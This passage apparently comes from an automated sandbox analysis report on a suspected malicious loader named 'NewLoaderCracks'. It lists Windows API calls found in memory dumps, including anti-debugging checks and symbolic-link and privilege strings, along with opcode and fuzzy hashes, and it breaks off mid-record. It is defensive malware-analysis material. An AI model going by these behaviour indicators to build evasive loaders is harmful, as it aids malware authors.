                • Instruction Fuzzy Hash: 949194B2544345BBE7219BA4DC4DFFB7BACFB89705F00481AB749D2081D7719A08DB62
                APIs
                • __EH_prolog.LIBCMT ref: 00547191
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 005472F1
                • CloseHandle.KERNEL32(00000000), ref: 00547301
                  • Part of subcall function 00547BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00547C04
                  • Part of subcall function 00547BF5: GetLastError.KERNEL32 ref: 00547C4A
                  • Part of subcall function 00547BF5: CloseHandle.KERNEL32(?), ref: 00547C59
                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0054730C
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0054741A
                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00547446
                • CloseHandle.KERNEL32(?), ref: 00547457
                • GetLastError.KERNEL32 ref: 00547467
                • RemoveDirectoryW.KERNEL32(?), ref: 005474B3
                • DeleteFileW.KERNEL32(?), ref: 005474DB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3935142422-3508440684
                • Opcode ID: 62bd3a42f0ddea30b03c45438094c48de329feec105a687bbae0249e61f5d16c
                • Instruction ID: 83938081980d560f00d20f0b29f784d6f58444c7f785ba47a85f25e977430583
                • Opcode Fuzzy Hash: 62bd3a42f0ddea30b03c45438094c48de329feec105a687bbae0249e61f5d16c
                • Instruction Fuzzy Hash: 96B1C271904219AADF20DFA4DC49BEE7FB8FF44308F0045A9F949E7142E734AA49DB61
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID: CMT$h%u$hc%u
                • API String ID: 3004599000-3282847064
                • Opcode ID: 0f301b30b083f82736e26f5761ef494fcee3d253a73b61294c35a0ddc13c96ba
                • Instruction ID: b6efcfb0a97c9bedd81df08ff31a55f65a2bd9e27a75ea063ab0e5f7f62c1d49
                • Opcode Fuzzy Hash: 0f301b30b083f82736e26f5761ef494fcee3d253a73b61294c35a0ddc13c96ba
                • Instruction Fuzzy Hash: 1C32B7715102859FDF14DF74C899AEA3FA5BF95308F04447EFD8A8B292DB709A48CB60
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: 9fb10777ef9fd41c82b84c8d9c8259bccad41691db0edafd973225670d232f65
                • Instruction ID: fd9556d9e946e3826d358d2046cf7a5656d1cdab205af903a20f9e445c843c0c
                • Opcode Fuzzy Hash: 9fb10777ef9fd41c82b84c8d9c8259bccad41691db0edafd973225670d232f65
                • Instruction Fuzzy Hash: 76C26C72E092288FDB25CE28DD457E9BBB5FB84305F1549EAD80DE7240E774AE818F50
                APIs
                • __EH_prolog.LIBCMT ref: 005427F1
                • _strlen.LIBCMT ref: 00542D7F
                  • Part of subcall function 0055137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0054B652,00000000,?,?,?,00010408), ref: 00551396
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00542EE0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1706572503-2756464174
                • Opcode ID: 724a0d94273fa04b8f4025a4432d9fc0c0c8369b3d6330957ce8a465cbfb8533
                • Instruction ID: a512db0d29cd267926676c169283a67c87f28f0e0cd39d659193ee39266b40af
                • Opcode Fuzzy Hash: 724a0d94273fa04b8f4025a4432d9fc0c0c8369b3d6330957ce8a465cbfb8533
                • Instruction Fuzzy Hash: 8262E2715042558FDF28DF28C8996EA3FE1BF94308F45457DFC9A8B282DB70A989CB50
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00568767
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00568771
                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0056877E
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: f0dbfa9da2966379eef7b546816640d11a0d7671eb5779f8e447850b379decc7
                • Instruction ID: 0f776e3ca74dbabdf0c7d52073e11482e2e8521d913079e7c6b0fc25e45f4253
                • Opcode Fuzzy Hash: f0dbfa9da2966379eef7b546816640d11a0d7671eb5779f8e447850b379decc7
                • Instruction Fuzzy Hash: B931D4759012299BCB21DF24D889B9CBBB8BF58311F5042EAE81CA7250EB309F859F45
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: 9aae9c10c81aba64955d1f9451e668b7857cbda7da38173fb79d553a52a8c997
                • Instruction ID: 723691953929af3879c01a9e9d000b4ba1dbd5647a7a5cd608dc0bed53a94e7c
                • Opcode Fuzzy Hash: 9aae9c10c81aba64955d1f9451e668b7857cbda7da38173fb79d553a52a8c997
                • Instruction Fuzzy Hash: 89310571800249AFDB249E79CC89EFB7FBEEB85314F0401A9F519A7251EA309D84CF60
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction ID: 4f00ef0c4d303f612621bf9eee3b6a8cefe1939a767b4c6c2deb9021347819f2
                • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction Fuzzy Hash: 34020B71E012199BDF14CFA9C8806ADFFB5FF88314F25816AD959E7384D731AE418B90
                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0055A662
                • GetNumberFormatW.KERNEL32(00000400,00000000,?,0057E600,?,?), ref: 0055A6B1
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: FormatInfoLocaleNumber
                • String ID:
                • API String ID: 2169056816-0
                • Opcode ID: da5e186be4ca97fdb3e3855f919f2003b94621830d8506d1a84d1fc02737c9d6
                • Instruction ID: a5a613cd3d9fa10faf44002c3b79b2b2fa339c062a6dece8a9e36b734a6eb0f8
                • Opcode Fuzzy Hash: da5e186be4ca97fdb3e3855f919f2003b94621830d8506d1a84d1fc02737c9d6
                • Instruction Fuzzy Hash: C7015E36510309BEDB10DF64EC06F9B7BBCFF29710F504462BA08A7150D7709A58E7A5
                APIs
                • GetLastError.KERNEL32(0055117C,?,00000200), ref: 00546EC9
                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00546EEA
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                • Opcode ID: 15923d6f1c7eacef820051c86578bebfb080f006769fc68f8444d1196e2d447b
                • Instruction ID: 673634276e5101bdc778f7365a4baadc772a54bbf6d4e22caa5661127f3e73f7
                • Opcode Fuzzy Hash: 15923d6f1c7eacef820051c86578bebfb080f006769fc68f8444d1196e2d447b
                • Instruction Fuzzy Hash: 06D0C7353C4303BFEB110A74DC09F677F94B766B56F108554B356D90D0D5709069B616
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0057118F,?,?,00000008,?,?,00570E2F,00000000), ref: 005713C1
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 6c6251dd502c5668785d37dfa228f58e4fcc2e7c7e2567bd4f3a0cbc3bbf5fed
                • Instruction ID: e896bd21375e9666c1f18235f59399cbcdac21b19462134fafc9b7351fbba97c
                • Opcode Fuzzy Hash: 6c6251dd502c5668785d37dfa228f58e4fcc2e7c7e2567bd4f3a0cbc3bbf5fed
                • Instruction Fuzzy Hash: 88B15735210A088FDB15CF2CD48AB657FA1FF05364F25C658E899CF2A2C335E981DB48
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID: gj
                • API String ID: 0-4203073231
                • Opcode ID: 79526e06094dedc202bcd65121b4318111e026f3c93e55a2aa2a76ccc54924ed
                • Instruction ID: 6434f71a612d7732ee881eb825a139d2c6f828381d0c6da29ab4b30593b21b67
                • Opcode Fuzzy Hash: 79526e06094dedc202bcd65121b4318111e026f3c93e55a2aa2a76ccc54924ed
                • Instruction Fuzzy Hash: 9FF1D3B1A083418FC348CF2AD880A5AFBE1BFCC208F15892EF598D7711E634E9459F56
                APIs
                • GetVersionExW.KERNEL32(?), ref: 0054AD1A
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                • Opcode ID: 6f5032f21b12ae2f7711a43ed6564c61bda40fe920937c44ae96b54b86743ddf
                • Instruction ID: e75d109c3e23d13b96f346de4697a170b4adb802d0b26680382e0e7b20d18ba1
                • Opcode Fuzzy Hash: 6f5032f21b12ae2f7711a43ed6564c61bda40fe920937c44ae96b54b86743ddf
                • Instruction Fuzzy Hash: 27F06DB0D0020C8BC768CF18EC466E977B5F768315F205295DE2853394D370AD88AF51
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0055EAC5), ref: 0055F068
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: b31a536fef107b35edde3027e74257f6ed666e0a01a066e16048476633318c3c
                • Instruction ID: d46941bee358ddac13dca7a5fc33cf57c3445a1b611e194c3da6dde80595319c
                • Opcode Fuzzy Hash: b31a536fef107b35edde3027e74257f6ed666e0a01a066e16048476633318c3c
                • Instruction Fuzzy Hash:
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 7217e341c4902f95d9abd5dbe9920ff1b487f47a9ff1f31c08d3c62c39928f47
                • Instruction ID: b03c4a6b8e4604321a68c875a0906b0ee2b9e7e0c2bface78e63f37d264ef4c7
                • Opcode Fuzzy Hash: 7217e341c4902f95d9abd5dbe9920ff1b487f47a9ff1f31c08d3c62c39928f47
                • Instruction Fuzzy Hash: E5A002745015418BD7408F75690D209379966555D174581555509C6560E6244554BF05
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                • Instruction ID: 3cbb65dcdafb25204cd5054702b331a929d3ca11ba696137fbb7c94be3e5ff8b
                • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                • Instruction Fuzzy Hash: 8962E571604B859FCB25CF28C8A06B9BFE1BF95305F44896EDC9A8B746D630A949CB10
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                • Instruction ID: de73573ae6785c48e401fda6bb3f5ae815abbe0133061317b46159102e54aa39
                • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                • Instruction Fuzzy Hash: CC620570608B4A9FC719CF28D8A05B9BFE1FB59305F14866EDC9687742D730EA59CB80
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                • Instruction ID: d0985ac4aedd735a9c06497ab33059140201f5670d1c436b0cf7e85bdf038827
                • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                • Instruction Fuzzy Hash: B4524AB26087018FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA59CB86
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28f0cb39348040b2be93a15e21e597b47aa29d319de74c418163c5d9ac9e48b8
                • Instruction ID: 067ea3a30843504ba96e05a1b9f855e921e25d10fcabca45cf69034ac6948901
